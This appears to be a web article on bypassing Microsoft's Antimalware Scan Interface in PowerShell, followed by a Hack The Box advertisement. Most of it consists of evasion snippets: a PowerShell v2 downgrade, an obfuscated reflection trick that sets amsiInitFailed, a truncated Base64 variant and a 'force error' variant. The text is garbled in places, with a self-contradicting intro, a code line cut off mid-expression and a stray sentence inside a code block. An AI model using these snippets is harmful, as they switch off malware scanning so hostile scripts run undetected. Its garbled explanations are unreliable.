Bypass AMSI: How to Bypass Antimalware Scanning

A comprehensive guide to understanding the bypass AMSI feature to skirting Microsoft’s built-in antimalware scan interface. Get an in-depth look at what the feature is and how it’s used to prevent malware from executing through scripting languages, allowing for a more secure experience. Learn the latest approaches and techniques to effectively avert malware threats and other risks with the help of the bypass AMSI feature.

AMSI is an important security feature built into the Windows operating system that helps detect and prevent malware from running on a system.

Bypass AMSI

It works by providing a channel for antivirus software to scan the content of scripts and other data before execution.

Malware scanning is an important part of the overall process of ensuring that your system is secure from external threats.

However, in some cases, it can be bypassed in order to gain access to the system. In this article, we will discuss the basics of antimalware scanning and how to bypass it.

Downgrade PowerShell

By default, PowerShell 5.0 and above require that scripts be scanned by the AMSI before execution. If the script contains malicious code, the AMSI will block its execution, which can hamper ethical hacking activities.

To bypass this, ethical hackers can use various techniques to downgrade the AMSI protection level, which can help them execute their PowerShell scripts without interference.

powershell -v 2 -c "<...>"

Classic

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeTVariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'
))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Base64

The AMSI bypass Base64 technique is used to bypass AMSI (Anti-Malware Scan Interface) using Base64 encoded strings in PowerShell. Since AMSI is designed to prevent malicious code from running by scanning the input of any script or command, cybercriminals have found ways to bypass this security mechanism.

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]:

Force AMSI error

The AMSI bypass Force AMSI error technique is a method used to bypass AMSI (Anti-Malware Scan Interface) in PowerShell. The technique consists of forcing an error condition in AMSI by passing an invalid script to the scanner. This will cause the scanner to stop scanning and return an error, allowing the malicious code to bypass the AMSI scanner altogether.

#Force AMSI error
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
With the corresponding AES key
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)

RFS (40)

Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.

Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.

Join the Network